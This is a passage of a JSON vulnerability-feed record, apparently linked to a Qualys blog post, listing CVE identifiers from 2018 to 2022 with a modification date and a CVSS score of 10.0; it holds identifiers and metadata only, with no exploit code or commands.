"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}